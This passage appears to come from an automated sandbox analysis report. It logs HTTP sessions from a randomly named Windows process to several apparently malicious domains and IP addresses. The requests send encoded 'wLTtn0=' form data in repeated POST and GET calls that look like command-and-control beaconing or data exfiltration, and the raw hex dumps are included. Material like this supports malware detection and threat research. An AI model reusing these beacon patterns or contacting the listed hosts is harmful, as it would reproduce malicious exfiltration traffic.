Aug 6, 2024 07:59:39.942176104 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 05:59:39 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 15 14 42 c0 dd 76 71 a1 ae 65 cd 1e 3c a6 cd 2c 29 74 9b 9a a4 16 ff bd 69 17 c1 cb c0 9b f9 de e3 0d bf c9 df b7 f2 b3 2a e0 55 be 95 50 9d 36 e5 7e 0b ab 7b c4 7d 21 77 88 b9 cc af 97 35 4b 11 8b c3 4a 24 dc 84 4b 27 b8 21 a5 a3 08 6d e8 48 64 69 06 07 1b 60 67 c7 5e 73 bc 2e 13 8e 0b c4 6b ab 7f 66 df 83 f8 c7 44 95 f0 41 48 43 e0 e8 6b 24 1f 48 c3 e9 58 c2 a4 3c f4 91 3b cf 1c d8 1e 82 69 3d 78 72 df e4 18 c7 61 4e 72 71 28 ad 1d 79 2f 5e 06 d5 18 c2 35 cb d8 e3 33 dc e6 54 b7 aa bf 83 8f c5 00 2a c0 34 4d cc 5f 94 37 8d 6d 7b d6 74 63 0d 95 75 01 9e 52 8e 7f 21 b1 eb d2 32 f6 9a bf 4b 7e 01 00 00 ff ff 0d 0a 61 0d 0a 03 00 77 cb be 04 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8LAK0`.Bvqe<,)tiUP6~{}!w5KJ$K'!mHdi`g^s.kfDAHCk$HX<;i=xraNrq(y/^53T4M_7m{tcuR!2K~aw0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49753	68.183.37.14	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:41.905441046 CEST	1834	OUT	POST /9g78/ HTTP/1.1 Host: www.smashcoin.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.smashcoin.club Referer: http://www.smashcoin.club/9g78/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 61 38 70 31 31 51 41 4b 4f 58 62 53 57 61 39 6e 35 37 43 4f 39 45 71 30 43 36 69 66 63 35 72 47 52 37 35 6d 52 71 44 38 6e 75 39 38 74 43 53 65 2b 55 49 56 5a 62 79 55 51 62 6c 58 78 36 4c 76 6d 42 50 69 59 50 71 62 66 45 62 45 44 54 73 45 71 37 66 58 78 63 7a 34 64 5a 4c 36 42 47 50 42 58 44 65 69 36 33 6d 31 72 41 6b 79 55 52 52 64 7a 45 7a 4d 6c 76 61 50 55 56 47 64 49 38 70 4b 64 54 35 62 31 77 58 45 50 48 45 69 31 78 4f 61 51 35 6c 33 33 44 68 2b 71 72 59 4d 55 61 37 34 36 72 66 77 5a 58 2b 32 45 66 43 4b 64 2b 67 57 4d 33 32 6f 43 72 78 4c 58 76 69 48 38 33 6f 71 73 5a 54 61 33 54 34 55 56 6c 2b 46 50 6f 4e 6e 78 33 33 67 38 6a 77 6f 77 34 2f 44 45 69 38 39 53 38 55 35 37 38 47 59 72 4a 43 2b 32 59 79 4c 64 4f 30 4d 6c 43 51 7a 59 35 63 74 33 67 4d 77 41 4e 35 57 5a 32 78 79 6e 47 78 4c 57 68 76 2b 72 70 41 2b 4b 65 49 78 2b 74 4c 75 52 68 31 43 4f 39 31 44 30 71 76 4f 62 33 4e 75 43 67 77 69 2b 31 54 44 31 6e 6f 53 4e 50 49 42 63 4d 47 4e 5a 65 36 79 52 6f 57 39 72 71 62 [TRUNCATED] Data Ascii: wLTtn0=a8p11QAKOXbSWa9n57CO9Eq0C6ifc5rGR75mRqD8nu98tCSe+UIVZbyUQblXx6LvmBPiYPqbfEbEDTsEq7fXxcz4dZL6BGPBXDei63m1rAkyURRdzEzMlvaPUVGdI8pKdT5b1wXEPHEi1xOaQ5l33Dh+qrYMUa746rfwZX+2EfCKd+gWM32oCrxLXviH83oqsZTa3T4UVl+FPoNnx33g8jwow4/DEi89S8U578GYrJC+2YyLdO0MlCQzY5ct3gMwAN5WZ2xynGxLWhv+rpA+KeIx+tLuRh1CO91D0qvOb3NuCgwi+1TD1noSNPIBcMGNZe6yRoW9rqbKcWAtSRJNZ5vCuESglqy49V6geaKNZGb1t9E3T8FlcML+zKJdVi4UmURJGR2f+7t2H38T+bBSpDUnrhv9F5DG8NA41Rd9sADzOjJxJepKLKe4jP0mIa2IiEUX1e3BQVLPXWI9HTQumKN88YIGVEE+/cQtxAN0AuCA2JMfKJ253c3aBULRDOkVXQ6i5jiVCEwKK1+KFHvRpLLguvUkyh0Jq6bheV2NC8gDZQiKL7zgCxdb73/OfYs0Iui/Iuki8zEP1j7nZXp0loRS8ZqC5KFe3WsY//SqgFGC8CVDBYt5FIWNLOgB8tWa+JMBTjrTGCeiyTySqqsQ2tn12riIawW01fmn0CdpaV+s68PW/4xmVnKCFPY9J04YjBqdjJAqSRo4jE/VxWkwk09wyHBmw0IFLVnBiRyw0efdmrCRiO2sEDw174VBgG4/LO3iBUPRruxbfl2nIwLnc1DwpdIdJUk+xoSUmQtF1ev9OZueJTTATKdBrAa95MVHSfw6wfJmkcKE3K4OaxQbObUC4yERtbvW8vmkvAHzUaukjzSzUTz1l+Z73LxAQAFKU6+uAFcbwiRtgzrWt+ik3R8E6s8906GhHbpWGfMRx81Aj+0O6o/oIT5tJiV+7HhCys6k8SyCf67T7cvuNEuqsTRuYIjPZAXWCMlKdbYS4C2Y5 [TRUNCATED]
Aug 6, 2024 07:59:43.074539900 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 05:59:42 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 15 14 42 c0 dd 76 71 a1 ae 65 cd 1e 3c a6 cd 2c 29 74 9b 9a a4 16 ff bd 69 17 c1 cb c0 9b f9 de e3 0d bf c9 df b7 f2 b3 2a e0 55 be 95 50 9d 36 e5 7e 0b ab 7b c4 7d 21 77 88 b9 cc af 97 35 4b 11 8b c3 4a 24 dc 84 4b 27 b8 21 a5 a3 08 6d e8 48 64 69 06 07 1b 60 67 c7 5e 73 bc 2e 13 8e 0b c4 6b ab 7f 66 df 83 f8 c7 44 95 f0 41 48 43 e0 e8 6b 24 1f 48 c3 e9 58 c2 a4 3c f4 91 3b cf 1c d8 1e 82 69 3d 78 72 df e4 18 c7 61 4e 72 71 28 ad 1d 79 2f 5e 06 d5 18 c2 35 cb d8 e3 33 dc e6 54 b7 aa bf 83 8f c5 00 2a c0 34 4d cc 5f 94 37 8d 6d 7b d6 74 63 0d 95 75 01 9e 52 8e 7f 21 b1 eb d2 32 f6 9a bf 4b 7e 01 00 00 ff ff 0d 0a 61 0d 0a 03 00 77 cb be 04 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8LAK0`.Bvqe<,)tiUP6~{}!w5KJ$K'!mHdi`g^s.kfDAHCk$HX<;i=xraNrq(y/^53T4M_7m{tcuR!2K~aw0
Aug 6, 2024 07:59:43.074696064 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 05:59:42 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 15 14 42 c0 dd 76 71 a1 ae 65 cd 1e 3c a6 cd 2c 29 74 9b 9a a4 16 ff bd 69 17 c1 cb c0 9b f9 de e3 0d bf c9 df b7 f2 b3 2a e0 55 be 95 50 9d 36 e5 7e 0b ab 7b c4 7d 21 77 88 b9 cc af 97 35 4b 11 8b c3 4a 24 dc 84 4b 27 b8 21 a5 a3 08 6d e8 48 64 69 06 07 1b 60 67 c7 5e 73 bc 2e 13 8e 0b c4 6b ab 7f 66 df 83 f8 c7 44 95 f0 41 48 43 e0 e8 6b 24 1f 48 c3 e9 58 c2 a4 3c f4 91 3b cf 1c d8 1e 82 69 3d 78 72 df e4 18 c7 61 4e 72 71 28 ad 1d 79 2f 5e 06 d5 18 c2 35 cb d8 e3 33 dc e6 54 b7 aa bf 83 8f c5 00 2a c0 34 4d cc 5f 94 37 8d 6d 7b d6 74 63 0d 95 75 01 9e 52 8e 7f 21 b1 eb d2 32 f6 9a bf 4b 7e 01 00 00 ff ff 0d 0a 61 0d 0a 03 00 77 cb be 04 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8LAK0`.Bvqe<,)tiUP6~{}!w5KJ$K'!mHdi`g^s.kfDAHCk$HX<;i=xraNrq(y/^53T4M_7m{tcuR!2K~aw0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49754	68.183.37.14	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:44.447570086 CEST	538	OUT	GET /9g78/?wLTtn0=X+BV2nsKYVO3UqYl5ZWo6jPzEbzXOI/Udo1sM5SItc9KlA6rxUMBXJvyY6Ftxpnu0wvQfLKpLy/FUSg1jobB/8nbOfP/D3DNJAGczSyXrwslR190ihSqsuv2aECoMONlQwFokBCzbjwv&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.smashcoin.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:59:45.031404018 CEST	466	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 05:59:44 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 280 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6d 61 73 68 63 6f 69 6e 2e 63 6c 75 62 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.59 (Debian) Server at www.smashcoin.club Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49755	178.63.50.103	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:50.327028036 CEST	819	OUT	POST /8yn3/ HTTP/1.1 Host: www.keswickstream.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.keswickstream.online Referer: http://www.keswickstream.online/8yn3/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 5a 33 56 39 66 47 65 2b 6b 73 76 37 30 42 47 30 6a 55 35 70 38 31 71 30 41 48 49 50 47 4c 62 2f 35 73 44 5a 31 41 78 70 54 55 51 6a 77 4c 42 4f 6e 77 67 6f 31 4e 6d 4f 5a 57 79 76 47 43 45 49 67 67 65 46 46 54 45 44 67 71 42 59 71 31 66 49 38 74 36 36 2f 56 34 43 71 62 6e 6b 66 7a 32 43 4b 73 73 6e 63 67 4d 6d 6b 6c 2f 59 78 69 6e 31 69 64 31 47 6f 56 51 6f 41 71 65 57 4a 47 39 54 44 7a 72 39 64 6f 31 49 6b 6b 37 69 6d 36 65 79 4b 47 51 76 5a 49 42 67 76 59 63 32 41 57 75 45 34 52 73 34 4d 74 34 48 78 43 62 62 38 77 50 36 6f 47 74 46 76 47 62 30 74 55 5a 7a 52 55 41 6f 45 56 4b 61 6b 62 4e 4c 47 6b 61 5a 65 6d 38 4c 57 67 3d 3d Data Ascii: wLTtn0=Z3V9fGe+ksv70BG0jU5p81q0AHIPGLb/5sDZ1AxpTUQjwLBOnwgo1NmOZWyvGCEIggeFFTEDgqBYq1fI8t66/V4Cqbnkfz2CKssncgMmkl/Yxin1id1GoVQoAqeWJG9TDzr9do1Ikk7im6eyKGQvZIBgvYc2AWuE4Rs4Mt4HxCbb8wP6oGtFvGb0tUZzRUAoEVKakbNLGkaZem8LWg==
Aug 6, 2024 07:59:50.991974115 CEST	226	IN	HTTP/1.1 302 Found Date: Tue, 06 Aug 2024 05:59:50 GMT Content-Length: 0 Connection: close cache-control: no-store location: http://keswickstream.online/8yn3/ x-powered-by: flexbe.com x-flexbe: gs1 [default] in 1 ms

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49756	178.63.50.103	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:52.881577015 CEST	839	OUT	POST /8yn3/ HTTP/1.1 Host: www.keswickstream.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.keswickstream.online Referer: http://www.keswickstream.online/8yn3/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 5a 33 56 39 66 47 65 2b 6b 73 76 37 31 67 57 30 6d 7a 4e 70 36 56 71 33 46 48 49 50 63 37 62 6a 35 73 66 5a 31 42 46 35 51 6d 30 6a 77 72 78 4f 6b 30 38 6f 35 74 6d 4f 58 32 79 75 4c 69 45 31 67 67 53 4e 46 58 4d 44 67 71 46 59 71 77 37 49 2f 65 43 37 75 56 34 4d 2f 4c 6e 71 43 6a 32 43 4b 73 73 6e 63 67 6f 66 6b 6c 33 59 78 52 50 31 7a 50 64 42 68 31 51 72 57 36 65 57 44 6d 39 66 44 7a 71 4e 64 72 78 78 6b 6d 7a 69 6d 37 75 79 4b 58 51 73 43 59 42 71 72 59 63 67 42 46 2b 4d 67 69 45 30 4a 4d 55 62 30 68 66 6f 30 6d 53 59 79 6b 68 70 78 58 6a 50 70 57 39 46 47 79 64 64 47 55 4f 43 70 35 35 71 5a 54 2f 7a 54 30 64 50 41 53 56 42 6f 70 2b 49 5a 6b 71 6d 6a 65 30 57 6e 75 72 38 79 6e 34 3d Data Ascii: wLTtn0=Z3V9fGe+ksv71gW0mzNp6Vq3FHIPc7bj5sfZ1BF5Qm0jwrxOk08o5tmOX2yuLiE1ggSNFXMDgqFYqw7I/eC7uV4M/LnqCj2CKssncgofkl3YxRP1zPdBh1QrW6eWDm9fDzqNdrxxkmzim7uyKXQsCYBqrYcgBF+MgiE0JMUb0hfo0mSYykhpxXjPpW9FGyddGUOCp55qZT/zT0dPASVBop+IZkqmje0Wnur8yn4=
Aug 6, 2024 07:59:53.508454084 CEST	226	IN	HTTP/1.1 302 Found Date: Tue, 06 Aug 2024 05:59:53 GMT Content-Length: 0 Connection: close cache-control: no-store location: http://keswickstream.online/8yn3/ x-powered-by: flexbe.com x-flexbe: gs1 [default] in 1 ms

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49757	178.63.50.103	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:55.424623966 CEST	1852	OUT	POST /8yn3/ HTTP/1.1 Host: www.keswickstream.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.keswickstream.online Referer: http://www.keswickstream.online/8yn3/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 5a 33 56 39 66 47 65 2b 6b 73 76 37 31 67 57 30 6d 7a 4e 70 36 56 71 33 46 48 49 50 63 37 62 6a 35 73 66 5a 31 42 46 35 51 6d 38 6a 78 61 52 4f 32 54 49 6f 34 74 6d 4f 4a 6d 79 72 4c 69 45 53 67 67 61 42 46 58 41 31 67 6f 4e 59 70 54 44 49 30 50 43 37 33 46 34 4d 67 37 6e 72 66 7a 32 54 4b 6f 42 75 63 67 34 66 6b 6c 33 59 78 55 4c 31 7a 64 31 42 6a 31 51 6f 41 71 65 4b 4a 47 39 7a 44 7a 7a 31 64 6f 64 68 6c 56 4c 69 6d 62 2b 79 4e 6c 34 73 4f 59 42 73 6e 34 64 6a 42 46 7a 53 67 69 5a 48 4a 4d 67 68 30 6a 66 6f 33 78 53 47 6a 6c 42 79 71 57 62 57 67 47 64 72 49 79 5a 4e 63 79 32 31 6f 34 68 34 66 55 72 71 49 53 6c 5a 53 79 38 6c 2f 61 47 4c 53 51 57 79 6c 4c 52 76 34 66 7a 2b 68 54 36 49 68 73 66 71 33 32 54 4e 4b 77 4c 6a 6f 4a 33 37 31 68 50 76 57 63 66 33 38 4f 52 59 70 61 59 67 2f 77 73 6f 62 44 4a 39 53 39 37 36 79 37 7a 4e 6f 64 67 2f 39 78 6d 32 36 6b 5a 46 71 6e 55 73 58 6f 62 56 70 47 38 72 32 72 71 66 53 6d 61 48 57 74 33 64 78 50 4d 6b 47 43 45 4d 39 56 57 55 70 65 47 [TRUNCATED] Data Ascii: wLTtn0=Z3V9fGe+ksv71gW0mzNp6Vq3FHIPc7bj5sfZ1BF5Qm8jxaRO2TIo4tmOJmyrLiESggaBFXA1goNYpTDI0PC73F4Mg7nrfz2TKoBucg4fkl3YxUL1zd1Bj1QoAqeKJG9zDzz1dodhlVLimb+yNl4sOYBsn4djBFzSgiZHJMgh0jfo3xSGjlByqWbWgGdrIyZNcy21o4h4fUrqISlZSy8l/aGLSQWylLRv4fz+hT6Ihsfq32TNKwLjoJ371hPvWcf38ORYpaYg/wsobDJ9S976y7zNodg/9xm26kZFqnUsXobVpG8r2rqfSmaHWt3dxPMkGCEM9VWUpeGaYsQDQTyeLAl1q9f4SvKhqwj6aXjZyOU6CE67ORihxIAIygsC/ORlZi6dlnJ1ge+zK9UVItbY4fBtet6K6MDYI70DNX5JJTkEaWFf4VqkoBjSSs1PYLuMeu6eAYg8ZbG+Y/DpOFhiT34nynOLqXq08/LpEFwFJ0CpyUY4rOHm2Yj0xirHIb4nunr4NcB896pIcs/KiVQOATVh9EgpcelqsvNTzx+FLiygBn5cj7zmDTLb8QdeWX4Oy4wI7uuWrxXhzbOVSDyTeqpkMPZI9tqeRxND12B+WSRxC5B2mQ+W5i7yZd4RW/XZC0tw5cYFEk+Cthv2xiB6R8dbDt2Aspt7wlYbXPYG0/182VAxpQXMDyrNUtwSbUsWm74o9INBy+oUOV++aYY2FT8rvx3uQXj33Fv7NcpsUOJ6hij6quvhaKYKMdjgeOSjcq+6SvKIBP8WK53jfBT3AZ+/wAotzFiCgKa+4kRO+rTQczBANlehqs3IL7mnbwUYAEPV6hui5Z/19cAgWwkXUCujTPIfTJsEMQZAo/MkAgQ8Im2Y6tYrfnLOBK4GvKxIiv3NdbkpUwNVzN00MlmdKwx56Y358Yiez5/5n61BK/R1FQ2hiKDQxL5hOmAKhW/Y1oqWriEOtsw4HMDb64Mic6QZzmqVUtiJV7FIQ+Wr3SPdC [TRUNCATED]
Aug 6, 2024 07:59:56.055305958 CEST	226	IN	HTTP/1.1 302 Found Date: Tue, 06 Aug 2024 05:59:55 GMT Content-Length: 0 Connection: close cache-control: no-store location: http://keswickstream.online/8yn3/ x-powered-by: flexbe.com x-flexbe: gs1 [default] in 1 ms

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49758	178.63.50.103	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:57.965095043 CEST	544	OUT	GET /8yn3/?wLTtn0=U19dcxmn6Ob5yxqWvQsW+QP5HF1VJp/R08/Tqyg6Y00c2I58wx0m/NKkc0ysAREJ2Ci+Jjsm2cVr9QKi8fHV5UgR9LrsAxuveq5wSVQj9G/u0V6Yivcjv0tzcPmEGWRNPAX/WIcmzgPK&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.keswickstream.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:59:58.614996910 CEST	405	IN	HTTP/1.1 302 Found Date: Tue, 06 Aug 2024 05:59:58 GMT Content-Length: 0 Connection: close cache-control: no-store location: http://keswickstream.online/8yn3/?wLTtn0=U19dcxmn6Ob5yxqWvQsW%20QP5HF1VJp%2FR08%2FTqyg6Y00c2I58wx0m%2FNKkc0ysAREJ2Ci%20Jjsm2cVr9QKi8fHV5UgR9LrsAxuveq5wSVQj9G%2Fu0V6Yivcjv0tzcPmEGWRNPAX%2FWIcmzgPK&K4G=Thy4J4VXH8ud x-powered-by: flexbe.com x-flexbe: gs1 [default] in 1 ms

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49759	64.64.253.144	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 08:00:04.501315117 CEST	801	OUT	POST /6ujs/ HTTP/1.1 Host: www.6666580a9.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.6666580a9.shop Referer: http://www.6666580a9.shop/6ujs/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 2f 4c 4d 44 42 67 32 53 76 73 5a 72 56 6f 6a 52 41 4b 6a 35 4a 75 2b 74 53 71 7a 52 2b 72 78 63 57 57 39 36 50 38 70 48 6e 5a 36 36 6e 2b 4d 41 34 4b 4d 35 4e 63 43 63 6a 4f 52 59 63 65 75 48 31 58 69 4b 72 58 2f 67 47 52 39 38 71 2b 68 41 55 4e 76 68 65 74 57 42 75 6e 51 32 4c 6d 2f 70 71 75 77 54 48 49 6b 45 64 65 58 74 64 35 4a 56 51 65 76 37 42 55 4b 67 35 58 65 41 30 64 30 57 32 57 31 6c 6b 76 48 4f 4f 72 37 4a 33 5a 6a 78 79 55 49 78 55 31 7a 59 41 54 31 78 44 4d 57 5a 56 6b 50 75 4e 4b 56 4f 6a 56 65 6b 64 33 45 6f 63 50 6a 33 43 4d 47 48 4f 69 75 54 47 77 33 54 53 43 6c 71 77 6e 6d 41 76 58 6b 5a 77 70 46 43 34 51 3d 3d Data Ascii: wLTtn0=/LMDBg2SvsZrVojRAKj5Ju+tSqzR+rxcWW96P8pHnZ66n+MA4KM5NcCcjORYceuH1XiKrX/gGR98q+hAUNvhetWBunQ2Lm/pquwTHIkEdeXtd5JVQev7BUKg5XeA0d0W2W1lkvHOOr7J3ZjxyUIxU1zYAT1xDMWZVkPuNKVOjVekd3EocPj3CMGHOiuTGw3TSClqwnmAvXkZwpFC4Q==
Aug 6, 2024 08:00:05.092885017 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 06:00:05 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49760	64.64.253.144	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
